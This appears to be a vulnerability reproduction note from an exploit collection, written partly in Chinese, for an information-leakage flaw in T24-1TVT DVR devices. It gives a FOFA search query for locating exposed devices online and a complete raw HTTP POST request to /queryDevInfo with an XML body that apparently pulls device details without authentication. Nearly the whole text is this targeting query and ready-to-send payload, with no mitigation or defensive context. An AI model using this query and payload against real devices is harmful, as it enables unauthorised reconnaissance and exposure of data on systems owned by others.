T24-1TVT-DVR-InformationLeakage
fofa语法:
fofa:“v\=20180615.01" src\="js/lib/require.js" type\="text/javascript”
漏洞复现:
payload:
POST /queryDevInfo HTTP/1.1
Host: ip
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS like Mac OS X) AppleWebKit (KHTML, like Gecko) Version Mobile Safari
Content-Length: 103
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8" ?>
<request version="1.0" systemType="NVMS-9000" clientType="WEB"/>